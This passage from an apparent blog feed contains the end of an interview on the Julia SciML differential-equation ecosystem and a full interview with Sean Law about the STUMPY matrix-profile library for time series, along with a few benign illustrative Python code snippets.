&lt;p&gt;Every differential equation solver specializes in some aspect of the differential equation, giving each one different performance characteristics. For example, BDF integrators, “the standard” for stiff equations, use values from past steps. This can speed things up if the equation is not too stiff, but if it’s too stiff then you cannot use a high order (known as the Dahlquist barrier) and it slows down. So it’s problem dependent as to how well it can mitigate numerical issues, which means for some problems it’s fast and in others it breaks down. Then, if you have discontinuities which are frequent, like dosing in pharmacometrics simulations, this also requires order reduction and thus makes this particular method slower. DifferentialEquations.jl has about 300 methods when you consider all of the tableaus across not just ODEs but also SDEs, DAEs, and DDEs, and it’s this collection that allows it to be efficient.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;regarding-the-importance-of-being-able-to-quantify-the-uncertainty-of-the-numerical-resolution-when-solving-differential-equations-how-does-sciml-address-this-problem&quot;&gt;Regarding the importance of being able to quantify the uncertainty of the numerical resolution when solving differential equations, how does SciML address this problem?&lt;&#x2F;h4&gt;
&lt;p&gt;DifferentialEquations.jl comes with a module DiffEqUncertainty.jl that gives sampling-based estimates of numerical uncertainty by causing jitter on the order of the error estimates calculated on each step. Normally these error estimates are only used for adapting dt, but this gives a way to get essentially a free estimate of what other possible paths look like. Andrew Stuart’s group at Caltech has a full publication showing that this method indeed matches the error distribution of the full solve. So if you run this a hundred times you’ll get a sense of what all of the possible trajectories could’ve been given the error tolerance that you allowed.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-multiscalearrays-in-what-ways-do-these-data-structures-help-us-in-simulating-complex-scientific-models&quot;&gt;What are MultiScaleArrays? In what ways do these data structures help us in simulating complex scientific models?&lt;&#x2F;h4&gt;
&lt;p&gt;The differential equation solvers, and actually all of the SciML ecosystem, work on abstract interfaces which allow for the concrete implementation of a type to be radically different from the standard implementation. MultiScaleArrays is a nice example of this where an entire multi-scale model is represented as both a graph structure and an array simultaneously. This lets the user write something like “for every cell in the lung, do the chemical reactions of a lung cell” to define a model, but have the stiff high-performance ODE solver automatically know how to interact with this object. It’s not even an array: it’s an array of arrays of arrays etc., which acts like an array. In this form it’s very efficient to allow cells to divide and die, and the ODE solver will adapt the size of the solution vector automatically as this changes.&lt;&#x2F;p&gt;
&lt;p&gt;While this was made with the specific case of multi-scale biological modeling in mind, other users have since come up with other great examples. CuArrays are CUDA-accelerated arrays that live on the GPU that can be dropped in as a replacement to the standard array, and ComponentArrays.jl defines an array type similar to MultiScaleArrays which is backed by a real vector, so it’s faster for standard computations but slower for size changes. A lot of new features can thus be directly added and optimized in the ODE solver just by changing the input types!&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-crRcFtHznAsYXDCb1uh4oQ.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-the-processes-of-solving-differential-equations-and-training-a-neural-networks-similar-how-do-you-put-together-both-frameworks&quot;&gt;Are the processes of solving differential equations and training a Neural Network similar? How do you put together both frameworks?&lt;&#x2F;h4&gt;
&lt;p&gt;Training a neural network is solving an ODE defined by the gradient of the loss function, integrated until the gradient reaches zero. Solving that ODE with Euler’s method is gradient descent. So you could use an ODE solver as the algorithm for training a neural ODE, and there is a use case that we’re looking into for that. Differential equations are more ubiquitous than I think most people realize.&lt;&#x2F;p&gt;
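That equivalence is easy to check in a few lines. The following is a hedged toy sketch in plain Python (not SciML code; the scalar loss L(theta) = (theta - 3)^2 is made up for illustration): applying explicit Euler to the gradient-flow ODE theta'(t) = -dL/dtheta reproduces the gradient-descent iterates exactly when the learning rate equals the step size dt.

```python
# Toy check: explicit Euler on  theta'(t) = -dL/dtheta  vs. plain gradient descent.
# Assumed loss for illustration: L(theta) = (theta - 3)^2,
# so dL/dtheta = 2 * (theta - 3) and the minimizer is theta = 3.

def grad(theta):
    return 2.0 * (theta - 3.0)

def euler_gradient_flow(theta0, dt, steps):
    theta = theta0
    for _ in range(steps):
        theta = theta + dt * (-grad(theta))  # one explicit Euler step
    return theta

def gradient_descent(theta0, lr, steps):
    theta = theta0
    for _ in range(steps):
        theta = theta - lr * grad(theta)     # standard GD update
    return theta

a = euler_gradient_flow(0.0, dt=0.1, steps=50)
b = gradient_descent(0.0, lr=0.1, steps=50)
assert a == b                  # identical iterates when lr == dt
assert abs(a - 3.0) < 1e-3     # both converge to the minimizer
```

An adaptive ODE solver applied to the same gradient-flow ODE would, in effect, pick the "learning rate" automatically at every step, which is the use case hinted at above.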
&lt;h4 id=&quot;is-gpu-computing-integrated-in-the-sciml-ecosystem-how-important-is-having-this-feature-to-a-scientific-computing-framework-nowadays&quot;&gt;Is GPU computing integrated in the SciML ecosystem? How important is having this feature to a scientific computing framework nowadays?&lt;&#x2F;h4&gt;
&lt;p&gt;Yes, there are two major ways. If you have “big kernels”, like PDE solving or neural networks integrated into models, you can do those calculations on the GPU. This is what’s known as “within-method parallelism”. One of the more recent techniques that we have is “between-method parallelism”, where we can automatically generate CUDA kernels from your model and parallelize that between trajectories of the solution. This uses some fancy code generation tricks thanks to tools like KernelAbstractions.jl, and allows “small problems” to have an effective way to use GPUs as well.&lt;&#x2F;p&gt;
&lt;p&gt;How important is it? Somewhat. There are problems which are extremely GPU-parallelizable, like neural ODEs and PDEs, and there are problems which are not, like lots of semi-mechanistic universal differential equation models. Whether a GPU is useful is very dependent on what and how you’re trying to model.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;in-which-cases-is-it-worth-to-add-a-bayesian-analysis-to-the-parameter-estimation-for-example-with-the-use-of-diffeqbayes-jl-what-are-its-advantages-over-more-classical-optimization-algorithms&quot;&gt;In which cases is it worth adding a Bayesian analysis to the parameter estimation, for example with the use of DiffEqBayes.jl? What are its advantages over more classical optimization algorithms?&lt;&#x2F;h4&gt;
&lt;p&gt;Bayesian analysis gives you a posterior distribution which has a sense of uncertainty quantification, i.e. it doesn’t just give you the “best parameter” but also a distribution which you can use to understand the error bars on your parameter estimate. In many cases this is a fundamentally interesting quantity. For example, in pharmacology we often want to know the probability that the drug concentration is in the safe zone. To evaluate this, we need a probabilistic fit of the model since only by including the uncertainty of our parameters can we get an accurate guess of the probabilities of the dynamics.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-c8-WwVO2Mlef4QqXP7SvSA.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;are-there-any-relevant-books-or-papers-you-would-like-to-recommend-for-digging-deeper-in-these-topics&quot;&gt;Are there any relevant books or papers you would like to recommend for digging deeper in these topics?&lt;&#x2F;h4&gt;
&lt;p&gt;Books schmooks. You’ll want to go directly to the sources. The only books I really recommend these days are Ernst Hairer’s “Solving Ordinary Differential Equations” I and II tomes: those are a work of art. Also Kloeden’s book on numerical methods for stochastic differential equations. Other than that, dive right into the scientific literature.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-next-for-sciml-are-you-currently-working-on-some-other-features-to-add-in-the-near-future&quot;&gt;What is next for SciML? Are you currently working on some other features to add in the near future?&lt;&#x2F;h4&gt;
&lt;p&gt;There’s tons we’re doing! I think a lot of what’s next is the integration of symbolic computing into all of our tools. ModelingToolkit.jl is the centerpiece of that push, and while I gave a talk at JuliaCon 2020 showcasing how it can be used as an automated code optimization tool (and gave a PyData 2020 talk on how you can GPU-accelerate ODE solves in R using it!), it’s so much more than that. It’s sometimes hard to do things correctly numerically: for example, ensuring positivity in an ODE solution can be difficult. But if you log-transform your model, then by definition your solution will always be positive. Right now this is up to the user, but what if we could automatically change the equations you wrote so that, not only are they more efficient, but they are also mathematically easier to solve and estimate? That’s the scope of ModelingToolkit, and if that interests you then you might want to stay tuned to that and its sister product NeuralSim, which is about automated surrogate acceleration for the ModelingToolkit modeling language.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Stumpy: unleashing the power of the matrix profile for time series analysis</title>
          <pubDate>Mon, 02 Nov 2020 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/stumpy-unleashing-the-power-of-the-matrix-profile-for-time-series-analysis/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/stumpy-unleashing-the-power-of-the-matrix-profile-for-time-series-analysis/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/stumpy-unleashing-the-power-of-the-matrix-profile-for-time-series-analysis/">&lt;h4 id=&quot;an-interview-with-stumpy-creator-sean-law&quot;&gt;An interview with Stumpy creator Sean Law&lt;&#x2F;h4&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-4Y5wJGqZM2AxKb7fmT9-og.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_Time_Series_Chains.html&quot;&gt;Stumpy documentation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;In the mid-20th century, the Information Age started. Every day an astonishing amount of data is created, and analyzing it in an efficient way requires computational tools that combine novel and clever approaches with cutting-edge technology.&lt;&#x2F;p&gt;
&lt;p&gt;Time series are a particular kind of data: the points measured are related by time, and analyzing them can often become quite difficult because time is not just like any other variable. More traditional methods like ARIMA or machine learning methods like LSTM can quickly become computationally inefficient as the number of points increases, and sometimes they can be too elaborate for simple results such as finding overall patterns in the data, not to mention the complications arising when finding more complex patterns in the data is the final goal.&lt;&#x2F;p&gt;
&lt;p&gt;Stumpy is a library for analyzing time series that tries to address the problems that appear when working with this kind of data. By design, Stumpy prioritizes high performance, simplicity, and general-purpose approaches for extracting meaningful information. We interviewed the team to learn more about this promising project.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-NWV2vLKBciK49BAVfzvN4Q.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-stumpy-what-are-the-goals-of-the-project&quot;&gt;What is STUMPY? What are the goals of the project?&lt;&#x2F;h4&gt;
&lt;p&gt;Numerous classical methods exist for understanding and analyzing time series data, such as data visualization, summary statistics, ARIMA modeling, Markov modeling, anomaly detection, forecasting, machine learning, deep learning, etc. The list goes on. However, when a data practitioner is presented with new or unfamiliar time series data, many of the aforementioned approaches often fail to uncover any significant pattern, anomaly, or unique observation since it isn’t known, a priori, whether or not an interesting insight even exists. Of course, if a behavior is found to be conserved within your time series (though, this may not always be true), then there must have been a reason why it was conserved and teasing out those reasons or causes can often be very useful. Note that with time series analysis we are rarely interested in single point statistics (i.e., global max, global min, etc) and, instead, it is more valuable to discover interesting “subsequences” (i.e., a continuous run of values along your time series with a preset length). So, when starting with time series analysis, one should really be asking:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Do any conserved behaviors (i.e., repeating subsequences) exist in my time series data?&lt;&#x2F;li&gt;
&lt;li&gt;If there are conserved behaviors, what are they and where are they?&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;A naive but straightforward approach that can help answer these questions (covered in more detail &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_The_Matrix_Profile.html&quot;&gt;here&lt;&#x2F;a&gt;) could involve comparing the Euclidean distance for every subsequence within the time series in a pairwise fashion in order to identify subsequences that are either highly conserved or exceptionally rare. This seems intuitive at first and it provides an exact solution to our problem but, as the size of the dataset increases (&amp;gt;10,000 data points), this brute force search can quickly become computationally intractable and reveals why approximate solutions (i.e., allowing for false positives and false negatives) or less interpretable solutions (above) have prevailed. Recently, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.ucr.edu&#x2F;~eamonn&#x2F;MatrixProfile.html&quot;&gt;independent research conducted at UC Riverside&lt;&#x2F;a&gt; has spawned a collection of brand new ideas and scalable algorithms that directly address this hard computational problem. However, the knowledge and capabilities that have been transferred to the scientific Python community have been limited.&lt;&#x2F;p&gt;
&lt;p&gt;And so, STUMPY was born. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;TDAmeritrade&#x2F;stumpy&quot;&gt;STUMPY&lt;&#x2F;a&gt; is a powerful and scalable Python package that faithfully reproduces the aforementioned academic work and, at its core, efficiently computes something called a “matrix profile”, which can be used for a variety of time series data mining tasks. Essentially, a matrix profile is a vector that stores the Euclidean distance (and index location) between each subsequence within a time series and its nearest neighbor. And, with 100% code coverage and multi-CPU&#x2F;multi-GPU support out of the box, the goal of STUMPY is to provide a highly reliable and user-friendly interface for modern time series analysis that can quickly and easily scale up to accommodate your ever-growing data needs.&lt;&#x2F;p&gt;
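To make that definition concrete, here is a hedged brute-force sketch in plain Python. The helper name `matrix_profile` is hypothetical and plain Euclidean distance is used for readability; this is not STUMPY's implementation, which computes a z-normalized profile far more efficiently:

```python
import math

def matrix_profile(ts, m):
    """Naive O(n^2) matrix profile: for each length-m subsequence, the
    Euclidean distance to (and index of) its nearest non-trivial neighbor."""
    n = len(ts) - m + 1                      # number of subsequences
    profile, indices = [], []
    for i in range(n):
        best, best_j = math.inf, -1
        for j in range(n):
            if abs(i - j) < m // 2:          # exclusion zone: skip trivial self-matches
                continue
            d = math.dist(ts[i:i + m], ts[j:j + m])
            if d < best:
                best, best_j = d, j
        profile.append(best)
        indices.append(best_j)
    return profile, indices

ts = [0, 1, 3, 1, 0, 1, 3, 1, 0]             # the shape [0, 1, 3, 1] repeats
mp, idx = matrix_profile(ts, m=4)
# mp[0] == 0.0 and idx[0] == 4: the motif at position 0 recurs at position 4.
```

Low points in the resulting profile mark motifs (conserved patterns) and high points mark discords (potential anomalies), which is exactly the information the tasks listed below build on.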
&lt;h4 id=&quot;what-kind-of-time-series-analysis-can-be-done-with-stumpy-in-what-fields-do-you-think-it-will-help-the-most&quot;&gt;What kind of time series analysis can be done with Stumpy? In what fields do you think it will help the most?&lt;&#x2F;h4&gt;
&lt;p&gt;As mentioned above, STUMPY is focused on efficiently computing a simple-to-interpret but highly useful data structure called the “matrix profile”. Earlier, Eamonn Keogh, one of the original academic researchers, claimed that “Given the matrix profile, most time series data mining problems are easy or trivial to solve in a few lines of code.” In fact, Keogh and his colleagues have since published over 20 papers demonstrating the many things that can be done once you’ve computed the matrix profile and, below, are just a few examples:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Motif discovery — identify conserved subsequences (related to pattern recognition)&lt;&#x2F;li&gt;
&lt;li&gt;Discord discovery — uncover subsequences that are poorly conserved (related to anomaly detection)&lt;&#x2F;li&gt;
&lt;li&gt;Time series chains — find related patterns that are evolving monotonically over time (related to forecasting)&lt;&#x2F;li&gt;
&lt;li&gt;Semantic segmentation — automatically determine regime changes within your time series data (related to change point detection)&lt;&#x2F;li&gt;
&lt;li&gt;Streaming data analysis&lt;&#x2F;li&gt;
&lt;li&gt;Multi-dimensional matrix profiles&lt;&#x2F;li&gt;
&lt;li&gt;Time series clustering&lt;&#x2F;li&gt;
&lt;li&gt;And more…&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;One of the benefits of computing matrix profiles with STUMPY is that it is 100% domain agnostic. This means that it is completely generalizable and can be applied in any field where you need to analyze continuous sequential data! In addition to the previously published examples, STUMPY has been applied in analyzing the stock market, bettering server uptime and resiliency, investigating call center conversation flow, understanding IoT sensor data, improving cryptocurrency model predictions, and stabilizing ion acceleration at CERN, just to name a few. Today, time series data is ubiquitous in both academia as well as industry and so we believe that STUMPY is a new tool that is extremely well positioned to help researchers and data scientists explore their data in a systematic and focused way and, hopefully, allow them to discover new insights with much less frustration and time spent. If you already have Python installed then you should be able to get started with STUMPY in less time than it takes for you to make a cup of coffee.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-are-the-benefits-of-computing-the-matrix-profile-in-the-context-of-analyzing-a-time-series-what-are-the-advantages-over-other-methods&quot;&gt;What are the benefits of computing the matrix profile in the context of analyzing a time series? What are the advantages over other methods?&lt;&#x2F;h4&gt;
&lt;p&gt;Matrix profiles are simple, intuitive, and interpretable. Basically, if you understand what the Pythagorean theorem is then you’re all set! Whereas with other methods, if you step away from the analysis for six months and then come back to it, you often have to perform a lot of mental gymnastics in order to remember and understand what was going on. With a single line of STUMPY code, you can compute your matrix profile and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_STUMPY_Basics.html&quot;&gt;quickly identify motifs (conserved patterns) and discords (potential anomalies) by looking at the minima and maxima&lt;&#x2F;a&gt;, respectively. From there, a slew of rapid post-analyses can be performed using the matrix profile and the subsequent results can help you develop further hypotheses and questions about your data. Additionally, unlike other methods which may be riddled with false positives and false negatives, matrix profiles are exact and don’t require any “training” in order to find patterns. It just works right out-of-the-box!&lt;&#x2F;p&gt;
&lt;h4 id=&quot;what-is-the-general-criteria-when-choosing-a-window-size-is-there-some-indicator-to-look-up-when-analysing-a-time-series&quot;&gt;What are the general criteria when choosing a window size? Is there some indicator to look up when analysing a time series?&lt;&#x2F;h4&gt;
&lt;p&gt;That’s a good question. Usually, the window size (i.e., the length of your subsequence or sliding window) should be chosen to be large enough to encompass a potential pattern. This usually requires a little bit of domain knowledge but the academic researchers have found that matrix profiles are not so sensitive to the choice of the window size so long as it isn’t smaller than the subsequence pattern. So, being in the rough ballpark is usually enough. However, since matrix profiles are pretty fast and cheap to compute, your best bet is to simply try several different window sizes, perhaps by repeatedly doubling your window size and observing where there may be conserved minima&#x2F;maxima across the set of matrix profiles. The academic researchers have also published a paper (which you can download &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.ucr.edu&#x2F;~eamonn&#x2F;PAN_SKIMP%20%28Matrix%20Profile%20XX%29.pdf&quot;&gt;here&lt;&#x2F;a&gt;) detailing a similar approach called a “pan matrix profile” that can help narrow down the search space. So, look out for this new STUMPY feature in an upcoming release!&lt;&#x2F;p&gt;
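The doubling heuristic can be sketched in a few lines. This is a hedged toy in plain Python with a made-up periodic signal (the helper `profile_minimum` is a naive stand-in, not STUMPY's API or the pan matrix profile): compute the profile minimum at each doubled window and look for windows whose minimum stays conserved, i.e. near zero.

```python
import math

def profile_minimum(ts, m):
    """Smallest nearest-neighbor distance over all length-m subsequences,
    skipping trivial self-matches (naive O(n^2) stand-in for a matrix profile)."""
    n = len(ts) - m + 1
    best = math.inf
    for i in range(n):
        for j in range(n):
            if abs(i - j) >= m // 2:         # outside the exclusion zone
                best = min(best, math.dist(ts[i:i + m], ts[j:j + m]))
    return best

ts = [0, 1, 3, 1] * 6                        # toy signal with period 4
mins = {m: profile_minimum(ts, m) for m in (4, 8, 16)}  # doubled window sizes
# Every window captures the repeating motif: mins == {4: 0.0, 8: 0.0, 16: 0.0}
```

With real, noisy data the minima would not be exactly zero; the signal to look for is a window size past which the minimum stops being clearly conserved.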
&lt;h4 id=&quot;what-is-semantic-segmentation-in-the-context-of-time-series-what-were-the-problems-in-the-past-with-this-method-and-how-do-you-solve-them&quot;&gt;What is semantic segmentation in the context of time series? What were the problems in the past with this method and how do you solve them?&lt;&#x2F;h4&gt;
&lt;p&gt;In the context of time series, “semantic segmentation” is “the division of a time series into internally consistent areas&#x2F;regimes” or, sometimes, you can think of it as a “special type of clustering with the additional constraint that the elements in each cluster are contiguous in time”. Basically, if you have a time series where the values are repeating periodically within some range and then, in response to some external change or event, the time series shifts into another mostly periodic range so that you are left with two distinct “regimes”, then semantic segmentation may be useful for helping you identify the boundary in between the regimes. Now, methods like “change point detection” exist for detecting changes in various statistical properties of the time series (i.e., the mean or variance) but, fundamentally, we are interested in regimes which are defined by changes in the shapes of the time series subsequences, which can change without any obvious effect on the statistical properties. And this is where matrix profiles come into play. By simply using the information stored within your matrix profile, you can automatically identify and label these boundary regions in a systematic way. You can learn more in this illustrative &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_Semantic_Segmentation.html&quot;&gt;STUMPY tutorial&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-does-the-sampling-rate-affect-the-analysis-of-a-time-series-how-often-are-important-patterns-hidden-because-of-a-bad-sampling-method&quot;&gt;How does the sampling rate affect the analysis of a time series? How often are important patterns hidden because of a bad sampling method?&lt;&#x2F;h4&gt;
&lt;p&gt;In general, sampling rate is quite important but it is often independent of the analysis method. If you have a conserved pattern that spans a full minute (i.e., it is a unique shape that is captured within 60 data points spaced one second apart) but you only collect a single aggregate data point once every hour, then it is impossible for any method to discover this pattern. Conversely, if you collect a data point once every microsecond then you might run out of storage space or lack the ability to analyze this large data set after 5 years. Unfortunately, in either case, having the best algorithms and the fastest hardware will not help you fix poor sampling. Or, as they say, “garbage in, garbage out”.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1--71VCPSQe2aIyw49RucHCQ.png&quot; alt=&quot;&quot; &#x2F;&gt;Source: &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_Time_Series_Chains.html&quot;&gt;Stumpy documentation&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;h4 id=&quot;stumped-is-the-distributed-version-of-stump-and-it-is-implemented-using-dask-why-have-you-chosen-dask-over-other-solutions-to-implement-stumped&quot;&gt;STUMPED is the distributed version of STUMP and it is implemented using Dask. Why have you chosen Dask over other solutions to implement STUMPED?&lt;&#x2F;h4&gt;
&lt;p&gt;As a research scientist, one of my pet peeves is software that is slow or that takes way too much time and effort to install. So, it was imperative for STUMPY to have minimal dependencies, be easy to install, and also be fast and scalable. Initially, when we prototyped STUMPY, everything was written using NumPy and SciPy and this worked well for time series that contained around 10K data points. However, we noticed that not all of the threads on our machine were being used (due to the GIL) and things started to take forever as we increased the length of our time series. At the time, Cython was a popular option for releasing the GIL but it seemed really hard to maintain from a packaging perspective and the coding style never felt “Pythonic”. In contrast, we had started hearing a lot of great things about Numba’s ability to JIT-compile Python code into performant machine code and so, within two days, we were able to parallelize STUMPY using Numba and leverage all of the compute power available on our local server. For data scientists, this is great and usually sufficient for small to medium-sized data sets but, naturally, we started thinking about distributed computing. Dask is a wonderful Python package that offers scalable analytics, can be easily distributed to over a thousand servers, and has a large user community. Additionally, we knew that Dask interoperated well with Numba and so, within five days, we were able to go from a single server to distributing our matrix profile computation across a 32 server Dask cluster. While other solutions currently exist for distributed computing, we really liked that Dask was lightweight, heavily battle-tested, and was supported by knowledgeable maintainers who had the right vision. While STUMPY does not leverage Dask’s “big data collections” (i.e., parallel arrays and dataframes), the robust dynamic task scheduling used by STUMPY is well beyond experimental.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;was-gpu-compatibility-challenging-to-integrate-in-the-project&quot;&gt;Was GPU compatibility challenging to integrate in the project?&lt;&#x2F;h4&gt;
&lt;p&gt;This is a great question! In our journey, we carefully assessed the landscape and seriously considered the idea of using PyCUDA, CuPy, TensorFlow, PyTorch, or even writing raw CUDA kernels and interfacing them with Cython. However, these technologies can either be too hard to install, too low level and verbose, too difficult to maintain (or for others to contribute to), or their APIs are simply too unstable. Ultimately, the best solution for adding GPU support was right underneath our noses and we didn’t even need to add any additional dependencies! Because, luckily for us, Numba is also able to JIT-compile Python code to target GPUs. Of course, it is important to point out that since the programming paradigm for GPUs is quite different from CPUs, STUMPY has to maintain separate Python modules that target the different hardware and we’ve had to develop new and unique ways to ensure proper and thorough testing of our software. However, the massive performance benefits gained from leveraging GPUs and not having to switch from Python to writing CUDA is well worth the tradeoffs. If anybody tries to convince you that “Python is slow” then I’d highly recommend trying Numba and Dask as they can easily help take your Python performance scaling to the next level. If you are interested in computing matrix profiles with STUMPY using GPUs then please check out this &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;colab.research.google.com&#x2F;drive&#x2F;1FIbHQoD6mJInkhinoMehBDj2E1i7i2j7&quot;&gt;Google Colab notebook&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;considering-you-have-chosen-numba-for-optimizing-and-parallelizing-computation-have-you-thought-about-using-julia-in-the-future-which-has-built-in-features-for-this-tasks&quot;&gt;Considering you have chosen Numba for optimizing and parallelizing computation, have you thought about using Julia in the future, which has built-in features for these tasks?&lt;&#x2F;h4&gt;
&lt;p&gt;Julia has certainly grown over the years but its adoption has been slow and so we’ve yet to consider it as a viable option. However, given the amount of effort that we’ve put into keeping our code base easy to read and digest, it shouldn’t be difficult to port STUMPY over to other languages and we’d certainly be open to sharing and collaborating in the future.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;how-do-you-justify-the-comparison-between-the-benchmark-using-256-cpus-stumped-256-against-the-one-using-16-gpus-gpu-stump-dgx2-especially-economically-speaking&quot;&gt;How do you justify the comparison between the benchmark using 256-CPUs (STUMPED.256) against the one using 16 GPUs (GPU-STUMP.DGX2), especially economically speaking?&lt;&#x2F;h4&gt;
&lt;p&gt;The STUMPY README provides rough &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;#performance&quot;&gt;performance benchmarks&lt;&#x2F;a&gt; but the point isn’t to debate whether GPUs are “faster” or “better suited” for computing matrix profiles than CPUs. If you have access to one or more GPUs, then you should definitely use them! However, if you don’t have access to top-of-the-line GPUs or national supercomputing clusters, STUMPY can still be useful. Benchmarks are always biased and outdated but our goal is to be transparent and to give people a clearer sense of how long their computation might take (depending on the size of their data) and what hardware resources they may need in order to realistically complete their analysis. Otherwise, the user should be able to make an informed decision as to whether or not STUMPY is suitable for their situation. For all intents and purposes, STUMPY is more than “fast enough” and, more importantly, it faithfully reproduces the academic work, so users can feel confident that STUMPY will perform equally well on better hardware and with larger data sets! Thanks to Moore’s law, you don’t have to take our word for it. Give STUMPY a try and let us know what you think!&lt;&#x2F;p&gt;
&lt;h4 id=&quot;in-the-paper-presenting-the-stomp-algorithms-an-implementation-in-a-seismologic-dataset-is-shown-working-with-a-really-huge-amount-of-data-and-analysing-it-within-days-how-near-are-we-from-real-time-anomaly-detection-systems-that-analyse-datasets-as-large-at-that-scale&quot;&gt;In the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cs.ucr.edu&#x2F;~eamonn&#x2F;STOMP_GPU_final_submission_camera_ready.pdf&quot;&gt;paper&lt;&#x2F;a&gt; presenting the STOMP algorithms, an implementation on a seismological dataset is shown, working with a very large amount of data and analysing it within days. How close are we to real-time anomaly detection systems that analyse datasets at that scale?&lt;&#x2F;h4&gt;
&lt;p&gt;To answer this question, one first needs to clearly define what is meant by “real-time”. Typically, this involves a situation where large amounts of data are being streamed in continuously and at a reasonably high frequency. Additionally, when discussing real-time analysis, it is important to identify how much data needs to be collected before the analysis can begin (i.e., is it one data point or do you need to collect 10 days worth of data before you can start) and it is also worth considering whether this is a sliding window analysis (i.e., where the oldest data point is removed as a new data point arrives). I can’t speak directly to the primary research but, in the 100 million data point seismology example, the dataset was actually recorded at 20 Hz and collected over 58 days but the matrix profile was computed in just over 12 days. In that particular case, the speed of analysis (12 days) was actually faster than the speed of data collection (58 days) and, naturally, if you could initiate your analysis with less data then the matrix profile computation would require substantially less time as well. Of course, this feels more like a batch analysis than a streaming analysis but hopefully the point that we’re trying to make is clear. In fact, the academic researchers have published additional work on how to incrementally update your matrix profile on-the-fly as additional data points are streamed in. This streaming-friendly capability is currently available in STUMPY and more detail can be found in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;stumpy.readthedocs.io&#x2F;en&#x2F;latest&#x2F;Tutorial_Matrix_Profiles_For_Streaming_Data.html&quot;&gt;this STUMPY tutorial&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
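To make the streaming idea concrete, here is a conceptual pure-Python sketch of how a matrix profile can be grown as points arrive. The class name and structure are hypothetical, invented only for illustration; STUMPY's actual streaming implementation is far more efficient and also applies an exclusion zone to suppress trivial matches between overlapping windows:

```python
import math

def zdist(a, b):
    # Euclidean distance between z-normalized copies of two equal-length windows
    def z(s):
        mu = sum(s) / len(s)
        sd = math.sqrt(sum((x - mu) ** 2 for x in s) / len(s))
        return [(x - mu) / sd for x in s]
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(z(a), z(b))))

class StreamingProfile:
    """Hypothetical sketch of an incrementally updated matrix profile.

    Each incoming point completes one new length-m window. We compare the
    new window against every earlier window; the new window records its
    nearest neighbor, and each earlier window may discover a closer
    neighbor and lower its own profile value."""
    def __init__(self, m):
        self.m = m
        self.ts = []
        self.windows = []
        self.profile = []

    def update(self, x):
        self.ts.append(x)
        if len(self.ts) < self.m:
            return  # not enough points yet for a full window
        w = self.ts[-self.m:]
        best = math.inf
        for i, old in enumerate(self.windows):
            d = zdist(old, w)
            best = min(best, d)
            self.profile[i] = min(self.profile[i], d)
        self.windows.append(w)
        self.profile.append(best)

sp = StreamingProfile(m=3)
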